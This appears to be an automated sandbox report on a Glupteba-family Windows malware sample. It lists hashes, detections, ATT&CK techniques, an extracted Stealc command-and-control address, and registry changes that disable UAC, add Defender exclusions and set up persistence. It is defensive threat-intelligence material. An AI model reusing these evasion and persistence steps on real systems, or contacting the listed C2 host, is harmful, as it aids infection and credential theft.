glupteba | 93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb

Analysis

max time kernel
300s
max time network
301s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
06-05-2024 22:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Size

405KB
MD5

4c03ddbf5fe9e55346e426b78c9a9b2c
SHA1

e8ad3b30d021822fe4c9f6d9c3645bd712224ee7
SHA256

93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb
SHA512

9abc493c5e467667890933b0663370797734fb625cc0fa80f59195606315bbf77c4f4882b20f5c4b1f999dbfb397bacd65c992ef071b21a076b056a55431e325
SSDEEP

12288:KB9cAtoKCYsciDNH2HwRM4J3jaEt1hUj2:U9cOviBH2QG45aEt1hUS

Score

10^/10

glupteba privateloader stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer themida trojan upx

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/4272-3466-0x0000024177F40000-0x000002417B774000-memory.dmp	family_zgrat_v1
behavioral2/memory/4272-3479-0x0000024118D50000-0x0000024118E5A000-memory.dmp	family_zgrat_v1
behavioral2/memory/4272-3483-0x0000024118A50000-0x0000024118A74000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 16 IoCs

resource	yara_rule
behavioral2/memory/4168-1342-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/4132-1343-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1836-1337-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/4872-1353-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5856-2455-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5980-2456-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5892-2457-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5812-2454-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5812-4402-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5892-4410-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5892-4405-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5856-4479-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5980-4482-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5812-4485-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5980-4404-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5856-4403-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	EawWaBuanqWfxA1wYQsP5UY0.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZQnEIniDJr491m3kOJDD4KtD.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\CDb5tzv095RAKNfASZDFNrbA.exe = "0"	CDb5tzv095RAKNfASZDFNrbA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Np7nxhZprpTK4hagH7g20Bek.exe = "0"	Np7nxhZprpTK4hagH7g20Bek.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7sdvdV1KeQFYxIWsBQgNwiWC.exe = "0"	7sdvdV1KeQFYxIWsBQgNwiWC.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	EawWaBuanqWfxA1wYQsP5UY0.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
139	4252	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 34 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5736	powershell.exe
208	powershell.exe
5420	powershell.exe
4620	powershell.exe
2064	powershell.EXE
5580	powershell.exe
704	powershell.exe
5632	powershell.exe
1152	powershell.exe
2356	powershell.exe
5472	powershell.exe
684	powershell.exe
4964	powershell.exe
5108	powershell.exe
5220	powershell.exe
600	powershell.exe
5824	powershell.exe
2436	powershell.exe
3392	powershell.exe
4964	powershell.exe
2356	powershell.exe
1436	powershell.exe
3080	powershell.exe
5124	powershell.exe
1928	powershell.exe
4860	powershell.exe
4488	powershell.exe
5300	powershell.exe
1724	powershell.exe
5984	powershell.exe
4248	powershell.exe
5164	powershell.exe
2172	powershell.exe
400	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5436	netsh.exe
1604	netsh.exe
1480	netsh.exe
1996	netsh.exe

Checks BIOS information in registry 2 TTPs 5 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	EawWaBuanqWfxA1wYQsP5UY0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	EawWaBuanqWfxA1wYQsP5UY0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation	MFzQQXm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Control Panel\International\Geo\Nation	UFfWEUA.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwDnLGjLKWRNBa2dymDC5MEm.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDufI9ZUlb248iYbQxStmXVn.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bFcZ3JdPhk8nNZtMIanhqTGb.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JT9YcIfdR3pLKCmNv9YadKgS.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZFRy4ZIsA0l9UIpfHHSKls8a.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ajsV0H1YWbsqgfl4SUqqj6NY.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ybr9QMmQzsSRORi6tkPdmDOl.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scFWU8puB6bLSmJaSkSrGAVI.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vBCQsFzFSk6wHjUyupxJCaFw.bat	regasm.exe

Executes dropped EXE 27 IoCs

pid	Process
2388	kKWXFd15rddOaRQr2Nfqo1Kf.exe
4132	Np7nxhZprpTK4hagH7g20Bek.exe
4168	CDb5tzv095RAKNfASZDFNrbA.exe
1836	7sdvdV1KeQFYxIWsBQgNwiWC.exe
4872	ZQnEIniDJr491m3kOJDD4KtD.exe
1032	3ULOn4cfburOeIlM0qC3zmfc.exe
868	EawWaBuanqWfxA1wYQsP5UY0.exe
3836	u1uc.0.exe
4836	Install.exe
5552	u1uc.1.exe
5812	7sdvdV1KeQFYxIWsBQgNwiWC.exe
5856	CDb5tzv095RAKNfASZDFNrbA.exe
5980	Np7nxhZprpTK4hagH7g20Bek.exe
5892	ZQnEIniDJr491m3kOJDD4KtD.exe
5724	a4RDq142GAZxIBaPaKzexogV.exe
360	Install.exe
1896	Install.exe
1028	Install.exe
200	csrss.exe
5364	injector.exe
6104	windefender.exe
2996	windefender.exe
3352	MFzQQXm.exe
1752	UFfWEUA.exe
5220	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
5952	713674d5e968cbe2102394be0b2bae6f.exe
5744	1bf850b4d9587c1017a75a47680584c4.exe

Loads dropped DLL 3 IoCs

pid	Process
3836	u1uc.0.exe
3836	u1uc.0.exe
4252	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000700000001ac06-232.dat	themida
behavioral2/memory/868-235-0x0000000140000000-0x0000000140862000-memory.dmp	themida
behavioral2/memory/868-1405-0x0000000140000000-0x0000000140862000-memory.dmp	themida

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/6104-5243-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\CDb5tzv095RAKNfASZDFNrbA.exe = "0"	CDb5tzv095RAKNfASZDFNrbA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZQnEIniDJr491m3kOJDD4KtD.exe = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Np7nxhZprpTK4hagH7g20Bek.exe = "0"	Np7nxhZprpTK4hagH7g20Bek.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7sdvdV1KeQFYxIWsBQgNwiWC.exe = "0"	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ZQnEIniDJr491m3kOJDD4KtD.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	ZQnEIniDJr491m3kOJDD4KtD.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	CDb5tzv095RAKNfASZDFNrbA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	Np7nxhZprpTK4hagH7g20Bek.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	7sdvdV1KeQFYxIWsBQgNwiWC.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	EawWaBuanqWfxA1wYQsP5UY0.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe

Drops Chrome extension 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	MFzQQXm.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	MFzQQXm.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	UFfWEUA.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	UFfWEUA.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	pastebin.com
3	pastebin.com

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	MFzQQXm.exe
File opened for modification	C:\Windows\System32\GroupPolicy	EawWaBuanqWfxA1wYQsP5UY0.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	MFzQQXm.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	EawWaBuanqWfxA1wYQsP5UY0.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	EawWaBuanqWfxA1wYQsP5UY0.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	MFzQQXm.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	MFzQQXm.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	UFfWEUA.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	MFzQQXm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	UFfWEUA.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	UFfWEUA.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
868	EawWaBuanqWfxA1wYQsP5UY0.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4184 set thread context of 3916	4184	93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb.exe	77

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	7sdvdV1KeQFYxIWsBQgNwiWC.exe
File opened (read-only)	\??\VBoxMiniRdrDN	CDb5tzv095RAKNfASZDFNrbA.exe
File opened (read-only)	\??\VBoxMiniRdrDN	Np7nxhZprpTK4hagH7g20Bek.exe
File opened (read-only)	\??\VBoxMiniRdrDN	ZQnEIniDJr491m3kOJDD4KtD.exe

Drops file in Program Files directory 25 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	MFzQQXm.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\MDLundO.xml	MFzQQXm.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\wSOcrIJ.dll	MFzQQXm.exe
File created	C:\Program Files (x86)\ADJLsahCU\qkATVY.dll	MFzQQXm.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	UFfWEUA.exe
